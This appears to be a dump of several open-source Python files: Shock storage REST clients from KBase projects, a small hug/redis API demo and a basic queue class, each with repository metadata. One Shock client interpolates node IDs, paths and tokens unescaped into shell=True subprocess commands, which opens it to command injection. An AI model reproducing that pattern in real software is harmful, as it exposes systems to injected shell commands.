    def _get_node_data(self, path):
        # GET /node<path> and unwrap the standard envelope.
        url = self.shock_url+'/node'+path
        try:
            rget = self.methods['get'](url, headers=self.auth_header)
        except Exception as ex:
            message = self.template.format(type(ex).__name__, ex.args)
            raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
        if not (rget.ok and rget.text):
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
        rj = rget.json()
        if not (rj and isinstance(rj, dict) and all([key in rj for key in ['status','data','error']])):
            raise Exception(u'Return data not valid Shock format')
        if rj['error']:
            raise Exception('Shock error %s: %s'%(rj['status'], rj['error'][0]))
        return rj['data']
    def download_to_string(self, node, index=None, part=None, chunk=None, binary=False):
        """Download a node's file and return it as text (or bytes)."""
        result = self._get_node_download(node, index=index, part=part, chunk=chunk, stream=False)
        if binary:
            return result.content
        else:
            return result.text
    def download_to_path(self, node, path, index=None, part=None, chunk=None):
        """Stream a node's file to `path` on disk; returns the path."""
        if path == '':
            raise Exception(u'download_to_path requires non-empty path parameter')
        result = self._get_node_download(node, index=index, part=part, chunk=chunk, stream=True)
        with open(path, 'wb') as f:
            for chunk in result.iter_content(chunk_size=8192):
                if chunk:
                    f.write(chunk)
                    f.flush()
        return path
    def _get_node_download(self, node, index=None, part=None, chunk=None, stream=False):
        # Build and issue the ?download request; returns the raw response.
        if node == '':
            raise Exception(u'download requires non-empty node parameter')
        url = '%s/node/%s?download'%(self.shock_url, node)
        if index and part:
            url += '&index='+index+'&part='+str(part)
        if chunk:
            url += '&chunk_size='+str(chunk)
        try:
            rget = self.methods['get'](url, headers=self.auth_header, stream=stream)
        except Exception as ex:
            message = self.template.format(type(ex).__name__, ex.args)
            raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
        if not (rget.ok):
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
        return rget
    def delete_node(self, node):
        """Delete a node by id; returns the full response envelope."""
        url = self.shock_url+'/node/'+node
        try:
            req = self.methods['delete'](url, headers=self.auth_header)
            rj = req.json()
        except Exception as ex:
            message = self.template.format(type(ex).__name__, ex.args)
            raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
        if rj['error']:
            raise Exception(u'Shock error %s: %s (%s)'%(rj['status'], rj['error'][0], node))
        return rj
    def index_node(self, node, index, column=None, force=False):
        """Create an index of the given type on a node's file."""
        url = "%s/node/%s/index/%s"%(self.shock_url, node, index)
        params = {}
        if column is not None:
            params['number'] = str(column)
        if force:
            params['force_rebuild'] = 1
        try:
            if params:
                url += '?'+urllib.urlencode(params)
            req = self.methods['put'](url, headers=self.auth_header)
            rj = req.json()
        except Exception as ex:
            message = self.template.format(type(ex).__name__, ex.args)
            raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
        if rj['error']:
            raise Exception(u'Shock error %s: %s (%s)'%(rj['status'], rj['error'][0], node))
        return rj
    def index_subset(self, node, name, parent, subset_file):
        """Create a subset index from the indices listed in `subset_file`."""
        url = "%s/node/%s/index/subset"%(self.shock_url, node)
        pdata = {'index_name': name, 'parent_index': parent, 'subset_indices': self._get_handle(subset_file)}
        mdata = MultipartEncoder(fields=pdata)
        headers = self.auth_header.copy()
        # MultipartEncoder supplies the multipart boundary content-type.
        headers['Content-Type'] = mdata.content_type
        try:
            req = self.methods['put'](url, headers=headers, data=mdata, allow_redirects=True)
            rj = req.json()
        except Exception as ex:
            message = self.template.format(type(ex).__name__, ex.args)
            raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
        if rj['error']:
            raise Exception(u'Shock error %s: %s (%s)'%(rj['status'], rj['error'][0], node))
        return rj
    def copy_node(self, parent_node, attr='', copy_index=True):
        """Create a new node that shares `parent_node`'s file data."""
        url = self.shock_url+'/node'
        pdata = {'copy_data': parent_node}
        if attr != '':
            pdata['attributes'] = self._get_handle(attr)
        if copy_index:
            pdata['copy_indexes'] = 'true'
        mdata = MultipartEncoder(fields=pdata)
        headers = self.auth_header.copy()
        headers['Content-Type'] = mdata.content_type
        try:
            req = self.methods['post'](url, headers=headers, data=mdata, allow_redirects=True)
            rj = req.json()
        except Exception as ex:
            message = self.template.format(type(ex).__name__, ex.args)
            raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
        if rj['error']:
            raise Exception(u'Shock error %s: %s'%(rj['status'], rj['error'][0]))
        return rj['data']
    def create_node(self, data='', attr='', data_name=''):
        """Create a new node, optionally with file data and attributes."""
        return self.upload("", data, attr, data_name)
    # file_name is name of data file
    # form == True for multi-part form
    # form == False for data POST of file
    def upload(self, node='', data='', attr='', file_name='', form=True):
        """Create (node == '') or update a node with data/attributes."""
        method = 'post'
        files = {}
        url = self.shock_url+'/node'
        if node != '':
            # Updating an existing node uses PUT on its id.
            url = '%s/%s'%(url, node)
            method = 'put'
        if data != '':
            files['upload'] = self._get_handle(data, file_name)
        if attr != '':
            files['attributes'] = self._get_handle(attr)
        if form:
            mdata = MultipartEncoder(fields=files)
            headers = self.auth_header.copy()
            headers['Content-Type'] = mdata.content_type
            try:
                req = self.methods[method](url, headers=headers, data=mdata, allow_redirects=True)
                rj = req.json()
            except Exception as ex:
                message = self.template.format(type(ex).__name__, ex.args)
                raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
        elif (not form) and data:
            # Raw-body upload: send the file handle directly as the body.
            try:
                req = self.methods[method](url, headers=self.auth_header, data=files['upload'][1], allow_redirects=True)
                rj = req.json()
            except Exception as ex:
                message = self.template.format(type(ex).__name__, ex.args)
                raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
        else:
            raise Exception(u'No data specificed for %s body'%method)
        if not (req.ok):
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, req.raise_for_status()))
        if rj['error']:
            raise Exception(u'Shock error %s: %s%s'%(rj['status'], rj['error'][0], ' ('+node+')' if node else ''))
        return rj['data']
    # handles 3 cases
    # 1. file path
    # 2. file object (handle)
    # 3. file content (string)
    def _get_handle(self, d, n=''):
        # Normalize `d` into a (name, file-like) pair for upload.
        try:
            if os.path.exists(d):
                name = n if n else os.path.basename(d)
                return (name, open(d))
            else:
                name = n if n else "unknown"
                return (name, cStringIO.StringIO(d))
        except TypeError:
            # os.path.exists raised: `d` is already a file object.
            try:
                name = n if n else d.name
                return (name, d)
            except:
                raise Exception(u'Error opening file handle for upload')
| {
"repo_name": "kbaseIncubator/mock_kbase",
"path": "lib/mock_kbase/clients/shock.py",
"copies": "1",
"size": "10684",
"license": "mit",
"hash": 5915998088704762000,
"line_mean": 41.2292490119,
"line_max": 120,
"alpha_frac": 0.5346312243,
"autogenerated": false,
"ratio": 3.747457032620133,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4782088256920133,
"avg_score": null,
"num_lines": null
} |
"""A basic Shock (https://github.com/MG-RAST/Shock) python access class.
Authors:
* Jared Wilkening
* Travis Harrison
"""
# -----------------------------------------------------------------------------
# Imports
# -----------------------------------------------------------------------------
import cStringIO
import os
import requests
import urllib
# -----------------------------------------------------------------------------
# Classes
# -----------------------------------------------------------------------------
class Client:
    """Minimal Shock REST client (plain `requests`, no toolbelt).

    All calls raise Exception on transport errors or when Shock returns
    an error payload; most successful calls return the 'data' member of
    Shock's standard {status, data, error} response envelope.
    """

    # Class-level defaults; overwritten per instance in __init__.
    shock_url = ""
    auth_header = {}
    token = ""
    # Template for reporting caught exceptions.
    template = "An exception of type {0} occured. Arguments:\n{1!r}"

    def __init__(self, shock_url, token=""):
        """Remember the server URL and, if given, set the auth token."""
        self.shock_url = shock_url
        if token != "":
            self.set_auth(token)

    def set_auth(self, token):
        """Build the OAuth Authorization header from a token string."""
        self.auth_header = {"Authorization": "OAuth %s" % token}

    def get_acl(self, node):
        """Return the full ACL document of a node."""
        return self._manage_acl(node, "get")

    def add_acl(self, node, acl, user):
        """Grant `user` the given acl type on a node."""
        return self._manage_acl(node, "put", acl, user)

    def delete_acl(self, node, acl, user):
        """Revoke `user`'s acl type on a node."""
        return self._manage_acl(node, "delete", acl, user)

    def _manage_acl(self, node, method, acl=None, user=None):
        # Shared implementation for ACL get/put/delete.
        url = self.shock_url + "/node/" + node + "/acl"
        if acl and user:
            url += "/" + acl + "?users=" + urllib.quote(user)
        try:
            if method == "get":
                req = requests.get(url, headers=self.auth_header)
            elif method == "put":
                req = requests.put(url, headers=self.auth_header)
            elif method == "delete":
                req = requests.delete(url, headers=self.auth_header)
        except Exception as ex:
            message = self.template.format(type(ex).__name__, ex.args)
            raise Exception(
                u"Unable to connect to Shock server %s\n%s" % (url, message)
            )
        if not (req.ok and req.text):
            raise Exception(
                u"Unable to connect to Shock server %s: %s"
                % (url, req.raise_for_status())
            )
        rj = req.json()
        # Sanity-check that the reply follows Shock's response envelope.
        if not (
            rj
            and isinstance(rj, dict)
            and all([key in rj for key in ["status", "data", "error"]])
        ):
            raise Exception(u"Return data not valid Shock format")
        if rj["error"]:
            raise Exception("Shock error: %d: %s" % (rj["status"], rj["error"][0]))
        return rj["data"]

    def get_node(self, node):
        """Fetch one node document by id."""
        return self._get_node_data("/" + node)

    def query_node(self, query):
        """Query nodes; `query` is a dict of attribute filters."""
        query_string = "?query&" + urllib.urlencode(query)
        return self._get_node_data(query_string)

    def _get_node_data(self, path):
        # GET /node<path> and unwrap the standard envelope.
        url = self.shock_url + "/node" + path
        try:
            rget = requests.get(url, headers=self.auth_header, allow_redirects=True)
        except Exception as ex:
            message = self.template.format(type(ex).__name__, ex.args)
            raise Exception(
                u"Unable to connect to Shock server %s\n%s" % (url, message)
            )
        if not (rget.ok and rget.text):
            raise Exception(
                u"Unable to connect to Shock server %s: %s"
                % (url, rget.raise_for_status())
            )
        rj = rget.json()
        if not (
            rj
            and isinstance(rj, dict)
            and all([key in rj for key in ["status", "data", "error"]])
        ):
            raise Exception(u"Return data not valid Shock format")
        if rj["error"]:
            raise Exception("Shock error: %d: %s" % (rj["status"], rj["error"][0]))
        return rj["data"]

    def download_to_string(self, node, index=None, part=None, chunk=None, binary=False):
        """Download a node's file and return it as text (or bytes)."""
        result = self._get_node_download(
            node, index=index, part=part, chunk=chunk, stream=False
        )
        if binary:
            return result.content
        else:
            return result.text

    def download_to_path(self, node, path, index=None, part=None, chunk=None):
        """Stream a node's file to `path` on disk; returns the path."""
        if path == "":
            raise Exception(u"download_to_path requires non-empty path parameter")
        result = self._get_node_download(
            node, index=index, part=part, chunk=chunk, stream=True
        )
        with open(path, "wb") as f:
            for chunk in result.iter_content(chunk_size=8192):
                if chunk:
                    f.write(chunk)
                    f.flush()
        return path

    def _get_node_download(self, node, index=None, part=None, chunk=None, stream=False):
        # Build and issue the ?download request; returns the raw response.
        if node == "":
            raise Exception(u"download requires non-empty node parameter")
        url = "%s/node/%s?download" % (self.shock_url, node)
        if index and part:
            url += "&index=" + index + "&part=" + str(part)
        if chunk:
            url += "&chunk_size=" + str(chunk)
        try:
            rget = requests.get(url, headers=self.auth_header, stream=stream)
        except Exception as ex:
            message = self.template.format(type(ex).__name__, ex.args)
            raise Exception(
                u"Unable to connect to Shock server %s\n%s" % (url, message)
            )
        if not (rget.ok):
            raise Exception(
                u"Unable to connect to Shock server %s: %s"
                % (url, rget.raise_for_status())
            )
        return rget

    def delete_node(self, node):
        """Delete a node by id; returns the full response envelope."""
        url = self.shock_url + "/node/" + node
        try:
            req = requests.delete(url, headers=self.auth_header)
            rj = req.json()
        except Exception as ex:
            message = self.template.format(type(ex).__name__, ex.args)
            raise Exception(
                u"Unable to connect to Shock server %s\n%s" % (url, message)
            )
        if rj["error"]:
            raise Exception(u"Shock error %s : %s" % (rj["status"], rj["error"][0]))
        return rj

    def index_node(self, node, index):
        """Create an index of the given type on a node's file."""
        url = "%s/node/%s/index/%s" % (self.shock_url, node, index)
        try:
            req = requests.put(url, headers=self.auth_header)
            rj = req.json()
        except Exception as ex:
            message = self.template.format(type(ex).__name__, ex.args)
            raise Exception(
                u"Unable to connect to Shock server %s\n%s" % (url, message)
            )
        if rj["error"]:
            raise Exception(u"Shock error %s : %s" % (rj["status"], rj["error"][0]))
        return rj

    def create_node(self, data="", attr="", data_name=""):
        """Create a new node, optionally with file data and attributes."""
        return self.upload("", data, attr, data_name)

    # file_name is name of data file
    # form == True for multi-part form
    # form == False for data POST of file
    def upload(self, node="", data="", attr="", file_name="", form=True):
        """Create (node == '') or update a node with data/attributes."""
        method = "POST"
        files = {}
        url = self.shock_url + "/node"
        if node != "":
            # Updating an existing node uses PUT on its id.
            url = "%s/%s" % (url, node)
            method = "PUT"
        if data != "":
            files["upload"] = self._get_handle(data, file_name)
        if attr != "":
            files["attributes"] = self._get_handle(attr)
        if form:
            try:
                if method == "PUT":
                    req = requests.put(
                        url, headers=self.auth_header, files=files, allow_redirects=True
                    )
                else:
                    req = requests.post(
                        url, headers=self.auth_header, files=files, allow_redirects=True
                    )
                rj = req.json()
            except Exception as ex:
                message = self.template.format(type(ex).__name__, ex.args)
                raise Exception(
                    u"Unable to connect to Shock server %s\n%s" % (url, message)
                )
        elif (not form) and data:
            # Raw-body upload: send the file handle directly as the body.
            try:
                if method == "PUT":
                    req = requests.put(
                        url,
                        headers=self.auth_header,
                        data=files["upload"][1],
                        allow_redirects=True,
                    )
                else:
                    req = requests.post(
                        url,
                        headers=self.auth_header,
                        data=files["upload"][1],
                        allow_redirects=True,
                    )
                rj = req.json()
            except Exception as ex:
                message = self.template.format(type(ex).__name__, ex.args)
                raise Exception(
                    u"Unable to connect to Shock server %s\n%s" % (url, message)
                )
        else:
            raise Exception(u"No data specificed for %s body" % method)
        if not (req.ok):
            raise Exception(
                u"Unable to connect to Shock server %s: %s"
                % (url, req.raise_for_status())
            )
        if rj["error"]:
            raise Exception(u"Shock error %s : %s" % (rj["status"], rj["error"][0]))
        else:
            return rj["data"]

    # handles 3 cases
    # 1. file path
    # 2. file object (handle)
    # 3. file content (string)
    def _get_handle(self, d, n=""):
        # Normalize `d` into a (name, file-like) pair for upload.
        try:
            if os.path.exists(d):
                name = n if n else os.path.basename(d)
                return (name, open(d))
            else:
                name = n if n else "unknown"
                return (name, cStringIO.StringIO(d))
        except TypeError:
            # os.path.exists raised: `d` is already a file object.
            try:
                name = n if n else d.name
                return (name, d)
            except BaseException:
                raise Exception(u"Error opening file handle for upload")
| {
"repo_name": "kbase/narrative",
"path": "src/biokbase/shock.py",
"copies": "2",
"size": "9732",
"license": "mit",
"hash": 4197090025117141500,
"line_mean": 35.4494382022,
"line_max": 88,
"alpha_frac": 0.4799630086,
"autogenerated": false,
"ratio": 3.9950738916256157,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5475036900225616,
"avg_score": null,
"num_lines": null
} |
"""A basic Shock(https://github.com/MG-RAST/Shock) python access class.
Uses shock-client for high performance uploads and download if it is in
the users path.
Authors:
* Jared Wilkening
* Travis Harrison
"""
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import cStringIO
import json
import os
import requests
import subprocess
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class Client:
    """Shock client that prefers the external `shock-client` binary.

    If `shock-client` is found on PATH it is used (via subprocess) for
    high-performance uploads/downloads; otherwise plain `requests`
    transfers are used.  All calls raise Exception on failure.
    """
    # Class-level defaults; overwritten per instance in __init__.
    shock_url = ''
    transport_method = ''
    auth_header = {}
    token = ''
    def __init__(self, shock_url, token=''):
        self.shock_url = shock_url
        # NOTE(review): set_auth() is called before transport_method is
        # decided below, so on construction the token is never pushed to
        # shock-client even when it is available -- confirm intent.
        if token != '':
            self.set_auth(token)
        if self._cmd_exists('shock-client'):
            self.transport_method = 'shock-client'
        else:
            self.transport_method = 'requests'
    def set_auth(self, token):
        """Build the OAuth header; also configure shock-client if in use."""
        self.auth_header = {'Authorization': 'OAuth %s'%token}
        if self.transport_method == 'shock-client':
            self._set_shockclient_auth(token)
    def _set_shockclient_auth(self, token):
        # Hand the bearer token to the external shock-client tool.
        proc = subprocess.Popen("shock-client auth set-token \'{\"access_token\": \"%s\"}\'"%(token), shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
        return_code = proc.wait()
        if return_code > 0:
            err = ""
            for line in proc.stderr:
                err += line
            raise Exception(u'Error setting auth token in shock-client: %s'%err)
    def get_node(self, node):
        """Fetch one node document by id."""
        url = self.shock_url+'/node/'+node
        try:
            rget = requests.get(url, headers=self.auth_header, allow_redirects=True)
        except Exception as e:
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
        if not (rget.ok and rget.text):
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
        rj = rget.json()
        # Sanity-check that the reply follows Shock's response envelope.
        if not (rj and isinstance(rj, dict) and all([key in rj for key in ['status','data','error']])):
            raise Exception(u'Return data not valid Shock format')
        if rj['error']:
            raise Exception('Shock error: %d: %s'%(rj['status'], rj['error'][0]))
        return rj['data']
    def download_to_path(self, node, path):
        """Download a node's file to `path`, via shock-client if available."""
        if node == '' or path == '':
            raise Exception(u'download_to_path requires non-empty node & path parameters')
        if self.transport_method == 'shock-client':
            return self._download_shockclient(node, path)
        url = '%s/node/%s?download'%(self.shock_url, node)
        try:
            rget = requests.get(url, headers=self.auth_header, allow_redirects=True, stream = True)
        except Exception as e:
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
        if not (rget.ok):
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
        with open(path, 'wb') as f:
            for chunk in rget.iter_content(chunk_size=8192):
                if chunk:
                    f.write(chunk)
                    f.flush()
        return path
    def _download_shockclient(self, node, path):
        # Parallel download through the external shock-client tool.
        proc = subprocess.Popen("shock-client pdownload -threads=4 %s %s"%(node,path), shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
        return_code = proc.wait()
        if return_code > 0:
            err = ""
            for line in proc.stderr:
                err += line
            raise Exception(u'Error downloading via shock-client: %s => %s: error: %s' %(node, path, err))
        else:
            return path
    def create_node(self, data='', attr=''):
        """Create a new node, optionally with file data and attributes."""
        return self.upload("", data, attr)
    def upload(self, node='', data='', attr=''):
        """Create (node == '') or update a node with data/attributes."""
        # Fast path: brand-new node from an on-disk file via shock-client.
        if self.transport_method == 'shock-client' and node == '' and os.path.exists(data):
            res = self._upload_shockclient(data)
            if attr == '':
                return res
            else:
                # Attributes still need a follow-up PUT through requests.
                node = res['id']
                data = ''
        method = 'post'
        (data_hdl, attr_hdl) = ('', '')
        files = {}
        url = self.shock_url+'/node'
        if node != '':
            # Updating an existing node uses PUT on its id.
            url = '%s/%s'%(url, node)
            method = 'put'
        if data != '':
            files['upload'] = self._get_handle(data)
        if attr != '':
            files['attributes'] = self._get_handle(attr)
        try:
            req = ""
            if method == 'put':
                req = requests.put(url, headers=self.auth_header, files=files, allow_redirects=True, stream = True)
            else:
                req = requests.post(url, headers=self.auth_header, files=files, allow_redirects=True, stream = True)
            rj = req.json()
        except Exception as e:
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
        if not (req.ok):
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, req.raise_for_status()))
        if rj['error']:
            raise Exception(u'Shock error %s : %s'%(rj['status'], rj['error'][0]))
        else:
            return rj['data']
    def _upload_shockclient(self, path):
        # Parallel upload through the external shock-client tool; returns
        # the parsed node document printed by the tool.
        proc = subprocess.Popen("shock-client pcreate -threads=4 -full %s"%(path), shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
        return_code = proc.wait()
        if return_code > 0:
            err = ""
            for line in proc.stderr:
                err += line
            raise Exception(u'Error uploading via shock-client: %s: error: %s' %(path, err))
        else:
            res = ""
            for line in proc.stdout:
                # Skip the tool's progress line; keep only the JSON body.
                if 'Uploading' not in line:
                    res += line
            return json.loads(res)
    def list(self, offset=0, limit=10):
        """List nodes with pagination."""
        url = self.shock_url+'/node/'+'?offset='+str(offset)+'&limit='+str(limit)
        try:
            rget = requests.get(url, headers=self.auth_header, allow_redirects=True)
        except Exception as e:
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
        if not (rget.ok and rget.text):
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
        rj = rget.json()
        if rj['error']:
            raise Exception(u'Shock error %s : %s'%(rj['status'], rj['error'][0]))
        else:
            return rj['data']
    def get_acl(self, nodeid, type=''):
        """Return a node's ACLs, optionally limited to one acl type."""
        url = self.shock_url+'/node/'+nodeid+'/acl'
        if type != '':
            url = url+'/'+type
        try:
            rget = requests.get(url, headers=self.auth_header, allow_redirects=True)
        except Exception as e:
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
        if not (rget.ok and rget.text):
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
        rj = rget.json()
        if rj['error']:
            raise Exception(u'Shock error %s : %s'%(rj['status'], rj['error'][0]))
        else:
            return rj['data']
    def delete_acl(self, nodeid, userlist, type=''):
        """Remove users from a node's ACL (all types if `type` is '')."""
        url = self.shock_url+'/node/'+nodeid+'/acl'
        if type == '':
            url = url+'/?all='
        else:
            url = url+'/?'+type+'='
        # NOTE(review): users are concatenated with no separator; with
        # more than one user this URL is almost certainly malformed.
        for user in userlist:
            url = url+user # I'm not sure what the separator character is
        try:
            rdel = requests.delete(url, headers=self.auth_header, allow_redirects=True)
        except Exception as e:
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
        if not (rdel.ok and rdel.text):
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rdel.raise_for_status()))
        rj = rdel.json()
        if rj['error']:
            raise Exception(u'Shock error %s : %s'%(rj['status'], rj['error'][0]))
        return
    def delete(self, nodeid):
        """Delete a node by id."""
        url = self.shock_url+'/node/'+nodeid
        try:
            rdel = requests.delete(url, headers=self.auth_header, allow_redirects=True)
        except Exception as e:
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
        if not (rdel.ok and rdel.text):
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rdel.raise_for_status()))
        rj = rdel.json()
        if rj['error']:
            raise Exception(u'Shock error %s : %s'%(rj['status'], rj['error'][0]))
        return
    def query(self, query):
        """Query nodes; `query` is a pre-encoded query string fragment.

        Returns None when the query matches no nodes.
        """
        url = self.shock_url+'/node/'+'?query&'+query
        try:
            rget = requests.get(url, headers=self.auth_header, allow_redirects=True)
        except Exception as e:
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
        if not (rget.ok and rget.text):
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
        rj = rget.json()
        if rj['error']:
            raise Exception(u'Shock error %s : %s'%(rj['status'], rj['error'][0]))
        elif rj['total_count'] == 0:
            return None
        else:
            return rj['data']
    def _get_handle(self, d):
        # Normalize `d` (path or string content) into a (name, file-like)
        # pair for upload.
        if os.path.exists(d):
            return (os.path.basename(d), open(d))
        else:
            return ("n/a", cStringIO.StringIO(d))
    def _cmd_exists(self, cmd):
        # True when `cmd` resolves in the user's shell (exit status 0).
        return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
| {
"repo_name": "kbase/probabilistic_annotation",
"path": "lib/biokbase/probabilistic_annotation/Shock.py",
"copies": "1",
"size": "9960",
"license": "mit",
"hash": -7527344736915362000,
"line_mean": 40.1611570248,
"line_max": 161,
"alpha_frac": 0.5144578313,
"autogenerated": false,
"ratio": 3.8029782359679265,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4817436067267926,
"avg_score": null,
"num_lines": null
} |
"""A basic (single function) API written using Hug."""
import hug
import redis
"""
Make sure you have redis installed via pip and redis-cli can connect
example add data first: http://127.0.0.1:8000/redis_add?ape=123456&rname=phrase
example call http://127.0.0.1:8000/redis_call?ape=123456&rname=phrase
"""
r = redis.StrictRedis(host='127.0.0.1', port=6379)
@hug.get('/happy_birthday')
def happy_birthday(name, age: hug.types.number = 1):
    """Greet *name* with a happy-birthday message for the given *age*."""
    return "Happy {age} Birthday {name}!".format(age=age, name=name)
@hug.get('/redis_call')
def a_redis_call(rname, ape=1):
    """Return the value stored under *rname*, gated by API key *ape*.

    The key must be a member of the Redis set 'ape'; each successful call
    decrements the caller's remaining-query counter, which is stored under
    the key itself.
    """
    if ape == 1:
        # Default value means the caller supplied no API key at all.
        # (The original tacked .format(**locals()) onto this literal, but
        # it contains no placeholders — the call was a no-op.)
        return "no valid api key specified, nice try though"
    if r.sismember('ape', ape) != 1:
        return "no valid api key specified, nice try though"
    coolness = r.get(rname).decode('utf8')
    r.decr(ape)
    # BUGFIX: redis-py returns bytes; without decoding, the message below
    # rendered the counter as b'999'. Also dropped a leftover debug print.
    numleft = r.get(str(ape)).decode('utf8')
    # BUGFIX: the original built this message with a backslash line
    # continuation inside the literal, embedding a run of indentation
    # whitespace mid-sentence.
    return ("Authenticated w {ape}. You have {numleft} queries left. "
            "This is the {rname} value you requested: {coolness}").format(
                ape=ape, numleft=numleft, rname=rname, coolness=coolness)
@hug.get('/redis_add')
def add_redis(rname, ape=1):
    """Register API key *ape* with 1000 queries and seed *rname* with a value.

    ape   -- numeric API key; added to the 'ape' membership set and used as
             the key holding the caller's remaining-query counter
    rname -- name of the demo value readable via /redis_call
    """
    r.sadd('ape', int(ape))
    r.set(ape, 1000)
    r.set(rname, 'a nice value here')
    # The original appended .format(**locals()) to this literal, but it has
    # no placeholders — the call was a no-op and has been removed.
    return "added successfully"
| {
"repo_name": "jamesacampbell/python-examples",
"path": "hug_api_example.py",
"copies": "1",
"size": "1357",
"license": "mit",
"hash": -7611011629491509000,
"line_mean": 31.3095238095,
"line_max": 79,
"alpha_frac": 0.6359616802,
"autogenerated": false,
"ratio": 3.098173515981735,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.42341351961817353,
"avg_score": null,
"num_lines": null
} |
"""A basic, stripped down queue.
"""
import collections as _collections
import collections.abc as _collections_abc
import functools as _functools
# Implementation note: The head of the queue at index 0.
@_functools.total_ordering
# TODO(sredmond): Sized,Iterable,Container is called Collection in 3.6+
class BasicQueue(_collections_abc.Sized, _collections_abc.Iterable, _collections_abc.Container):
    """A basic FIFO queue backed by a collections.deque.

    The head of the queue (the next element to dequeue) is at index 0.
    """
    def __init__(self, data=None):
        """Create a queue, optionally seeded with the elements of *data*."""
        self._d = _collections.deque()
        if data:
            self._d.extend(data)

    def __contains__(self, val):
        return val in self._d

    def __iter__(self):
        """Iterate from the front of the queue to the back."""
        return iter(self._d)

    def __len__(self):
        return len(self._d)

    # Methods from C++ library
    def enqueue(self, value):
        """Add *value* to the back of the queue."""
        self._d.append(value)

    def dequeue(self):
        """Remove and return the front element.

        Raises IndexError when the queue is empty. (The original empty-check
        was an `if ...: pass` placeholder that silently fell through to
        deque.popleft's own, less descriptive IndexError.)
        """
        if not self._d:
            raise IndexError("BasicQueue.dequeue: Attempting to dequeue an empty queue")
        return self._d.popleft()

    def clear(self):
        """Remove every element from the queue."""
        self._d.clear()

    def peek(self):
        """Return (without removing) the front element.

        Raises IndexError when the queue is empty.
        """
        if not self._d:
            raise IndexError("BasicQueue.peek: Attempting to peek at an empty queue")
        return self._d[0]

    def back(self):
        """Return (without removing) the back element.

        Raises IndexError when the queue is empty.
        """
        if not self._d:
            raise IndexError("BasicQueue.back: Attempting to read the back of an empty queue")
        return self._d[-1]

    def __str__(self):
        return str(self._d).replace('deque', 'BasicQueue', 1)

    # TODO(sredmond): Add a repr method?
    def __eq__(self, other):
        # Return NotImplemented for foreign types instead of raising
        # AttributeError on other._d.
        if not isinstance(other, BasicQueue):
            return NotImplemented
        return self._d == other._d

    def __le__(self, other):
        # BUGFIX: this previously returned `self._d < other._d` (strict
        # less-than), making `a <= b` false for equal queues — and since
        # functools.total_ordering derives __lt__/__gt__/__ge__ from __le__
        # and __eq__, every derived comparison was wrong too.
        if not isinstance(other, BasicQueue):
            return NotImplemented
        return self._d <= other._d

    # Synonyms
    add = enqueue
    remove = dequeue
    front = peek
# Removed: isempty, size, equals
# Explicit public API of this module.
__all__ = ['BasicQueue']
| {
"repo_name": "sredmond/acmpy",
"path": "campy/datastructures/basicqueue.py",
"copies": "1",
"size": "1896",
"license": "mit",
"hash": -6297651866067230000,
"line_mean": 25.7042253521,
"line_max": 96,
"alpha_frac": 0.5928270042,
"autogenerated": false,
"ratio": 3.7995991983967934,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.48924262025967935,
"avg_score": null,
"num_lines": null
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.